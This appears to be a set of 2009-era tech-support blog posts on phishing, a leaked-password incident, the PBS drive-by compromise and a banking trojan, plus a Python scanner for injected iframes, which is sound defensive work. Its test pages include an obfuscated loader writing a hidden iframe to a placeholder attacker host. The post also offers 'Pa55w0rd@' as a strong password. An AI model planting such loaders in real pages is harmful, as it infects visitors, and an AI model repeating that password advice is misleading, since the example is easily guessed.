    Always be mindful in accepting “invitations”, especially when it concerns your personal information. This particular spam message, and the associated website, are already blocked by Trend Micro products via the Smart Protection Network.

    *********************************************************

        Now let’s go over what the TrendMicro blog said. By phishing, the bad guys try to get your information so that they can then get access to your account.  Once on your account they can use your “legit” account to help spread the malware, in addition to possibly getting account information for banking or other financial accounts, considering that these days it’s very common for people to keep emails or other notes that may contain account information.

        On a related note, another news story posted today (10/5) by Neowin.net, concerning the fact that over 10,000 Windows Live user names/passwords were posted online in the past few days, most likely means that the bad guys got that information via a phishing scheme like the one explained by TrendMicro.  The compromised accounts affect Hotmail, Windows Live Messenger, Zune and Xbox accounts, to name a few, as most people share the same sign-in throughout the various Microsoft online sites and offerings.  The complete story on the password posting can be seen at http://www.neowin.net/news/main/09/10/05/thousands-of-hotmail-passwords-leaked-online

         Here are some of the most important things to keep in mind when using email, instant messaging, Twitter, any social networking site, or basically anything on the internet.

    1) Regularly change your passwords. I know this one drives most people nuts, but changing your passwords can keep someone else who knows your password from accessing your account. (If you currently use any Microsoft online passwords like Hotmail, Messenger, Xbox, Zune, etc., it is highly recommended that you change your password and your secret access code immediately due to that breach.)

    2) Do not use the word “password” or admin or bank or “your name” or anything that anyone over the age of 5 can guess.  Passwords should be what is called alpha-numeric, including caps and symbols, which means it should look something like this: Pa55w0rd@ (which is the word password with a capital P, followed by the number 5 twice instead of the letter s, a zero instead of the letter o, and the @ symbol at the end).

    3) If you receive an email from “a friend or relative or your bank or the IRS or anyone at all” asking you to click on a link or enter any private information, before doing it, check with them and ask if they sent it and confirm why they are asking.  Those few minutes lost verifying whether it is legit will save you a ton of headaches and save you from paying me a ton of money (not that I don’t want you to pay me a ton of money, but I’m here to help you, so this is your warning: no matter how much you really, really want to, don’t do it, or at least verify that your bank account has enough money to pay me when I have to go out and clean up your mess).

    Tech: PBS Website compromised for a time and used to infect pc’s

    Over the past few weeks I’ve seen a rise in calls from clients that got malware infections on their pc’s.  They all ask the same thing: “How did I get infected, when I know better and don’t open attachments, and follow all those things everyone says you’re supposed to do to be safe?”  I’ve had to explain that the latest way the bad guys are getting to your machine involves using exploits to infect websites that people visit every day, and then using the legitimate website to infect your pc. 

         If what is occurring still doesn’t make sense to you, think of it this way:

         No matter where you live, everyone has seen a news story about someone who shows up at a home dressed like a water company or cable company employee, telling you that they need to access your house to check something or access your back yard to fix something, and then once you let them in they do something like rob you (and hopefully that’s all they do).  What is occurring in the computer world is the same thing.   

    The Purewire blog (http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits) has a story about PBS that occurred last week (and PBS has since fixed this), but this just shows how you could still get infected even while taking all the “best practices” precautions.

    From the story:

    On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

    A forensic analysis of this attack revealed that the user requested the following:

    hxxp://www.pbs.org/parents/curiousgeorge

    which in turn requested:

    hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

    instead of:

    hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

    Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.


    PBS Login Prompt

    If correct credentials are not provided, dipsy.pbs.org serves an error page that looks normal:

    … until you look under the hood. The end of the error page’s source:

    contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

    hxxp://qxfcuc.info/f.cgi?jzo

    The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992), CVE-2009-0927 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927), and CVE-2007-5659 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659)), AOL Radio AmpX (CVE-2007-6250 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6250)), AOL SuperBuddy (CVE-2006-5820 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820)) and Apple QuickTime (CVE-2007-0015 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015)).

    The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to "Send a message to ICQ #559156803; stats available under ststst02."
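    The Purewire write-up describes the tell-tale shape of this kind of compromise: an obfuscated script tacked onto the end of an otherwise normal page that writes an iframe pointing at a third-party host. The scanner below is an added example for site owners and techs who want to check their own pages for that pattern; it is not Purewire’s, PBS’s or this blog’s code. It parses a page with Python’s standard html.parser, flags iframes that are hidden (zero or one pixel, display:none) or point off-site, and flags script blocks that combine two or more loader-style constructs (document.write, unescape, String.fromCharCode, eval, an iframe tag built inside a string). The sample pages and every hostname in them are constructed placeholders, not real indicators.

```python
"""Static scan of HTML source for injected-iframe indicators.

Added example (not Purewire's, PBS's or this blog's code). It looks for the
pattern described in the write-up above: an obfuscated script block that
writes an iframe pointing at a third-party host, plus directly embedded
hidden iframes. All sample pages and hostnames below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructs that legitimate pages rarely combine but injected loaders usually do.
SUSPICIOUS_SCRIPT_PATTERNS = {
    "document.write": r"document\.write\s*\(",
    "unescape": r"\bunescape\s*\(",
    "fromCharCode": r"String\.fromCharCode",
    "eval": r"\beval\s*\(",
    "iframe-in-string": r"<\s*iframe",
}


class InjectedIframeScanner(HTMLParser):
    """Collects findings while the page is parsed; use scan_html() below."""

    def __init__(self, page_host):
        super().__init__()
        # The page's own host and its subdomains count as first party (a simplification).
        self.site = page_host.lower().removeprefix("www.")
        self.findings = []
        self._script = None      # buffer for the script body being read, or None
        self._script_line = 0

    def _first_party(self, host):
        return host == self.site or host.endswith("." + self.site)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._script, self._script_line = [], self.getpos()[0]
        elif tag == "iframe":
            self._check_iframe(attrs, self.getpos()[0])

    def handle_data(self, data):
        # html.parser hands script bodies over as data, so buffer them until </script>.
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            self._check_script(body, self._script_line)

    def _check_iframe(self, attrs, line):
        src = attrs.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and not self._first_party(host):
            reasons.append("third-party src host " + host)
        width, height = attrs.get("width", ""), attrs.get("height", "")
        if width in ("0", "1") or height in ("0", "1"):
            reasons.append("hidden size %sx%s" % (width or "?", height or "?"))
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if reasons:
            self.findings.append({"line": line, "kind": "iframe", "src": src, "reasons": reasons})

    def _check_script(self, body, line):
        hits = [name for name, pat in SUSPICIOUS_SCRIPT_PATTERNS.items()
                if re.search(pat, body, re.I)]
        # A lone document.write is common in old but legitimate pages; two or more indicators is not.
        if len(hits) >= 2:
            self.findings.append({"line": line, "kind": "script", "src": None, "reasons": hits})


def scan_html(source, page_host):
    """Return a list of finding dicts (line, kind, src, reasons) for one page."""
    parser = InjectedIframeScanner(page_host)
    parser.feed(source)
    parser.close()
    return parser.findings


# Constructed sample pages; the hosts are placeholders, not real indicators.
CLEAN_PAGE = """<html><body>
<h1>Page not found</h1>
<iframe src="http://www.example-site.test/footer.html" width="600" height="80"></iframe>
<script>document.write("<p>Copyright</p>");</script>
</body></html>"""

# Same page with a loader appended at the end, the shape the write-up describes.
INJECTED_SCRIPT_PAGE = CLEAN_PAGE.replace("</body>", """<script>
var t = unescape("%3Cif%72ame src=");   // tag name obfuscated, decoded at run time
document.write(t + '"http://attacker-placeholder.test/inject.html" width=1 height=1></iframe>');
</script>
</body>""")

# Same page with a hidden off-site iframe embedded directly.
HIDDEN_IFRAME_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://attacker-placeholder.test/inject.html" width="0" height="0" style="display: none"></iframe>
</body>""")

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("script", INJECTED_SCRIPT_PAGE), ("iframe", HIDDEN_IFRAME_PAGE)]:
        print(name, scan_html(page, "www.example-site.test"))
```

    Run it against saved copies of your own pages (including error pages, which is exactly where the injection sat in this case) and review every finding by hand; the two-indicator rule for scripts keeps the noise down, but a page that legitimately builds markup at run time will still show up and needs a human to clear it.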

    Alert: How malware / viruses can ruin your day

         From the Panda Labs Blog (http://pandalabs.pandasecurity.com/): this shows how malware and viruses can make small changes to your online banking screens and fool you into giving up information that can then be used to make unauthorized charges or clean your bank account out. (Click on the link below, “Live Demo”, or look on the sidebar under VodPod Videos.)

    Live Demo: Banking Trojan (http://vimeo.com/6491332) from Panda Security (http://vimeo.com/pandasecurity) on Vimeo.

         I had a client a couple of days ago who asked me to clean her pc of viruses. During the conversation she mentioned that, on top of having to deal with the virus on the PC, she was dealing with her bank because someone got her info and drained her bank account in one evening.  She mentioned that she didn’t know how they did it, because she knew she followed all the rules people know for keeping her information private:

    - She would shred old documents

    - Had very difficult sign-on passwords

    - Only thing she did online was banking at her bank, she would never buy anything online because she was afraid that somehow her info would be compromised (which it was anyways).

         I unfortunately had to explain to her that the virus I was cleaning from her PC was the reason her information was compromised and her bank account drained.  The Panda Labs demo in this post shows how, normally, going to a banking site (they use Bank of America in the example; however, I should point out that B of A was not the bank my client was using) you get prompted for your Online ID and Online password for your bank.  However, as shown, once the machine is infected the entire site looks normal to an untrained eye, except for the fact that your sign-on suddenly wants you to enter your PIN #.  Considering you’re at your bank’s website by all appearances, most people would not think twice about entering that information.  However, as shown in the video, the information on the sign-in is actually being sent to criminals who can then use it to steal from you without ever meeting you in person. 

         Just another example of why you need a good anti-virus and a good anti-malware (and yes, these are 2 different functions) on your machine, and why both programs need to be updated regularly and run regularly to try and keep your PC secure. Also, if you do get infected, you should either directly address the issue and make sure to clean your machine if you know what you’re doing, or make sure that a trained professional cleans your machine before doing any sensitive work on your pc.
